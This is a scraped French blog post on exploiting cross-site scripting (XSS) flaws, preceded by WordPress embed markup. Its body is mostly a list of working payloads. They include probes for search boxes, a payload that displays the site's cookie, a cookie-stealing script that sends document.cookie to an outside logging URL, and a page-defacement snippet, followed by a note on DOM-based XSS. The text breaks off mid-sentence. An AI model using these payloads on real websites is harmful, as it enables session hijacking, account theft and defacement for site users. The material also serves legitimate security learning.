Exploiter les vulnérabilités XSS - Sécuriser votre site

1.0Sécuriser votre sitehttps://www.searchevolution.com/securityGermainhttps://www.searchevolution.com/security/author/germain/Exploiter les vulnérabilités XSS - Sécuriser votre siterich600338<blockquote class="wp-embedded-content" data-secret="cFlsdtX4uu"><a href="https://www.searchevolution.com/security/2021/07/27/exploiter-les-vulnerabilites-xss/">Exploiter les vulnérabilités XSS</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://www.searchevolution.com/security/2021/07/27/exploiter-les-vulnerabilites-xss/embed/#?secret=cFlsdtX4uu" width="600" height="338" title="« Exploiter les vulnérabilités XSS » — Sécuriser votre site" data-secret="cFlsdtX4uu" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script type="text/javascript"> /* <![CDATA[ */ /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); /* ]]> */ </script> Vérifier si un site est vulnérable à une faille XSS (réflexion). On entre ce code dans une boîte de recherche. Si rien n’est filtré, souvent, dans le résultat de recherche, les termes recherchés sont affichés. <script>alert("Hello")</script> <script>alert(window.location.hostname)</script> #alternative Afficher le cookie du site <script>alert(document.cookie)</script> Voler un cookie <script>document.location='http://www.searchevolution.com/log/'+document.cookie</script> Changer le contenu de la page web <script>document.querySelector('#thm-title').textContent = 'I am a Hacker'</script> document.getElementById('thm-title').innerHTML="test"; Xss DOM. Parfois une partie du DOM est modifié et une action est nécessaire pour activer notre script. Par exemple, on peut nous demander le nom d’un image et afficher cette nouvelle image sur le site. On pourraithttp://192.168.0.1/favicon.ico